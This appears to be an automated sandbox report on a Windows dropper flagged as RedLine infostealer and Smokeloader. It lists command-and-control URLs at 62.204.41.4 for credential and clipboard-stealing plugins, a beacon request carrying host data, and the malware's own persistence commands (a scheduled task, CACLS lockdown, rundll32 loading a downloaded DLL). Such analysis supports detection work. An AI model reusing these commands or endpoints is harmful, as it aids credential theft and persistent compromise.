00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

Source: Joe Sandbox View

IP Address: 62.204.41.4 62.204.41.4

Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll2;
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll(;
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dlli;
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dlls
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php(l
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php4
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php5342a2
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php8
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php9e5342a2
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpC
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpH
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpQ
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpR
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpZI
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpa
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpa106e76
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpd
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpi
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpion
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpix
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpm32
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpn
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpoft
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpp
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe#
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe=
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exel
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phps

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 6_2_008C86E2 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

Source: global traffic	HTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
Source: global traffic	HTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:57:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4

Source: unknown

HTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1

Source: xriv.exe, 00000006.00000002.365562441.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00073BA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00075C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01083BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01085C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00418244
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00401650
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00418788
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058786D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005818B7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005831F0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005989EF
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00583187
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00582B17
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005984AB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00582DF7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058DE78
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00588EC7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00587EA6
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00586F07
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00598F33
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0059A725
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005877D9
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_02130DB0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_02130DAC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008E8530
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008E754D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008C6F40

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00071F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01081F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: String function: 0058E43F appears 44 times
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: String function: 008D5E20 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: String function: 008D7CE0 appears 40 times

Source: file.exe	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 381118 bytes, 2 files, at 0x2c +A "bKug.exe" +A "xriv.exe", ID 1586, number 1, 18 datablocks, 0x1503 compression
Source: bKug.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 189668 bytes, 2 files, at 0x2c +A "aKuf.exe" +A "nika.exe", ID 1546, number 1, 9 datablocks, 0x1503 compression

Source: file.exe, 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aKuf.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@37/14@0/1

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0007597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Code function: 4_2_00007FF9A5D41B10 ChangeServiceConfigA,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00074FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

Source: file.exe	ReversingLabs: Detection: 64%
Source: file.exe	Virustotal: Detection: 52%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
